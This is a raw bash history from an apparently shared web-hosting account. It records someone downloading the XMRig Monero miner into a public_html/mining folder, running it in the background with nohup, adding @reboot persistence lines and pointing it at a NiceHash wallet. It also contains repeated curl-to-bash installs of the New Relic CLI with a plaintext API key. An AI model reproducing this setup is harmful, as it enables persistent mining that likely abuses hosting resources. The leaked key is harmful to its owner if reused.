File: /home/griievz70lba/.bash_history
#1755168834
htop
#1755168907
sudo apt install htop -y
#1755168913
sudo yum install htop -y
#1755168923
top
#1755168956
htop
#1755168976
sudo apt install htop -y
#1755168986
apt install htop -y
#1755169044
apt install htop
#1755169052
sudo install htop
#1755169101
wget http://hisham.hm/htop/releases/3.2.2/htop-3.2.2.tar.gz
#1755169114
tar -xvzf htop-3.2.2.tar.gz
#1755169117
cd htop-3.2.2
#1755169125
ls
#1755169153
./configure --prefix=$HOME
#1755169164
cd configure --prefix=$HOME
#1755169281
nproc
#1755169299
grep -c ^processor /proc/cpuinfo
#1755169306
lscpu
#1755169319
cat /proc/cpuinfo
#1755169962
cd public_html/mining
#1755169970
sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
#1755169984
sudo apt update
#1755170006
wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-x64.tar.gz
#1755170006
tar -xvf xmrig-6.20.0-linux-x64.tar.gz
#1755170009
cd xmrig-6.20.0
#1755170140
cd public_html/mining/xmrig-6.20.0
#1755170148
nohup ./xmrig -c config.json > miner.log 2>&1 &
#1755170160
tail -f miner.log # View live logs
#1755170180
echo "vm.nr_hugepages=1280" | sudo tee -a /etc/sysctl.conf # Improve performance
#1755170227
@reboot cd /public_html/mining/xmrig-6.20.0 && ./xmrig -c config.json
#1755170231
cd..
#1755170237
..cd
#1755170239
cd
#1755170243
@reboot cd /public_html/mining/xmrig-6.20.0 && ./xmrig -c config.json
#1755170289
@reboot cd /home/username/public_html/mining/xmrig-6.20.0 && ./xmrig -c config.json
#1755170303
ls -l ./xmrig
#1755170303
file ./xmrig
#1755170318
cd ls -l ./xmrig
#1755170318
file ./xmrig
#1755170333
cd /public_html/mining/xmrig-6.20.0
#1755170342
cd public_html/mining/xmrig-6.20.0
#1755170352
ls -l ./xmrig
#1755170352
file ./xmrig
#1755170367
./xmrig -c config.json
#1755170420
chmod +x xmrig
#1755170420
nohup ./xmrig -c config.json > miner.log 2>&1 &
#1755170423
tail -f miner.log
#1755170470
cd ~/public_html/mining
#1755170470
rm -rf xmrig-6.20.0*
#1755170470
wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-x64.tar.gz
#1755170470
tar -xvf xmrig-6.20.0-linux-x64.tar.gz
#1755170474
cd xmrig-6.20.0
#1755170545
nohup ./xmrig -c config.json > miner.log 2>&1 &
#1755170556
ps aux | grep xmrig # Should show your miner process
#1755170560
tail -f miner.log # Check the logs
#1755170573
crontab -e
#1755170609
@reboot cd /home/griievz70lba/public_html/mining/xmrig-6.20.0 && ./xmrig -c config.json
#1755170627
cd ~/public_html/mining
#1755170629
nano start_miner.sh
#1755170675
chmod +x start_miner.sh
#1755170684
nohup ./start_miner.sh > miner.log 2>&1 &
#1755170717
cd ~/public_html/mining
#1755170717
wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-x64.tar.gz
#1755170717
tar -xvzf xmrig-6.20.0-linux-x64.tar.gz
#1755170717
cd xmrig-6.20.0
#1755170717
ls -l
#1755170726
ls
#1755170740
./xmrig -c config.json
#1755170748
cd ./xmrig -c config.json
#1755170751
ls
#1755170772
nohup ./xmrig -c config.json > miner.log 2>&1 &
#1755170772
tail -f miner.log
#1755170808
file xmrig
#1755170818
ldd xmrig
#1755170924
tar -xvzf xmrig-6.20.0-linux-x64.tar.gz
#1755170981
cd..
#1755170983
cd
#1755170988
curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash && sudo NEW_RELIC_API_KEY=NRAK-4GZRP3F9T1CT3K6QFSK752KYIQS NEW_RELIC_ACCOUNT_ID=7008337 /usr/local/bin/newrelic install -y
#1755171029
curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash
#1755171047
curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash && sudo NEW_RELIC_API_KEY=NRAK-4GZRP3F9T1CT3K6QFSK752KYIQS NEW_RELIC_ACCOUNT_ID=7008337 /usr/local/bin/newrelic install -y
#1755171059
cd public_html
#1755171062
curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash && sudo NEW_RELIC_API_KEY=NRAK-4GZRP3F9T1CT3K6QFSK752KYIQS NEW_RELIC_ACCOUNT_ID=7008337 /usr/local/bin/newrelic install -y
#1755171099
sudo curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash && sudo NEW_RELIC_API_KEY=NRAK-4GZRP3F9T1CT3K6QFSK752KYIQS NEW_RELIC_ACCOUNT_ID=7008337 /usr/local/bin/newrelic install -y
#1755171132
curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash
#1755171150
apt install sudo
#1755171160
yum install sudo
#1755171659
cd ~/public_html
#1755171667
nano .user.ini
#1755171799
touch .user.ini
#1755171866
cd ~/public_html/mining/xmrig-6.20.0
#1755171868
sha256sum -c SHA256SUMS
#1755171879
file xmrig
#1755171888
cd ~/public_html/mining
#1755171888
wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz
#1755171889
tar -xvf xmrig-6.20.0-linux-static-x64.tar.gz
#1755171891
cd xmrig-6.20.0
#1755171905
chmod +x xmrig
#1755171909
ls
#1755171922
./xmrig -c config.json
#1755171931
ps aux | grep xmrig
#1755171931
tail -f miner.log
#1755171953
./xmrig -o randomxmonero.auto.nicehash.com:443 -u 3MkRohousC58TRKBVKJWetfqbCPwoF48sB.worker1 -p x --tls --coin monero
#1755171966
cd..
#1755171969
cd
#1755171971
cd ~/public_html/mining
#1755171971
wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-x64.tar.gz
#1755171972
tar -xvf xmrig-6.18.1-linux-x64.tar.gz
#1755171972
cd xmrig-6.18.1
#1755171972
chmod +x xmrig
#1755171974
./xmrig -o randomxmonero.auto.nicehash.com:443 -u 3MkRohousC58TRKBVKJWetfqbCPwoF48sB.worker1 -p x --tls --coin monero
#1755171984
ls
#1755172018
cd ~/public_html/mining/xmrig-6.18.1
#1755172018
find . -type f -name xmrig
#1755172037
file xmrig
#1755172054
ls
#1755172054
config.json SHA256SUMS
#1755172059
ls
#1755172088
find ~/public_html/mining -type f -name xmrig
#1755172102
file xmrig
#1755172223
cd ~/public_html/mining/xmrig-6.18.1
#1755172223
file xmrig
#1755172223
ldd xmrig
#1755172239
cd
#1755172242
wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
#1755172242
tar -xvf xmrig-6.24.0-linux-static-x64.tar.gz
#1755172242
cd xmrig-6.24.0
#1755172242
chmod +x xmrig
#1755172660
file xmrig
#1755172664
ls
#1755172677
cd public_html
#1755172679
ls
#1755172690
cd mining
#1755172692
ls
#1755172707
cd xmrig-6.24.0
#1755172726
cd xmrig-6.20.0
#1755172729
ls
#1755172733
cd
#1755172750
cd public_html
#1755172756
cd mining
#1755172762
cd xmrig-6.18.1
#1755172764
ls
#1755172875
cd public_html
#1755172877
ls
#1755172884
cd mining
#1755172888
wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
#1755172893
ls
#1755172916
tar -xvf xmrig-6.24.0-linux-static-x64.tar.gz
#1755172916
cd xmrig-6.24.0
#1755172916
chmod +x xmrig
#1755172926
wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
#1755172934
ls
#1755173158
curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash
#1755173168
wget curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash
#1755173179
wget -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash
#1755173195
newrelic version
#1755173245
newrelic install
#1755173276
curl -Ls https://download.newrelic.com/install/newrelic-cli/scripts/install.sh | bash
#1755173276
newrelic install
#1755173303
sudo
#1755173311
which curl
#1755173311
which wget
#1755173311
which bash
#1755173311
which sudo
#1755173327
ls
#1755173605
nano ~/public_html/info.php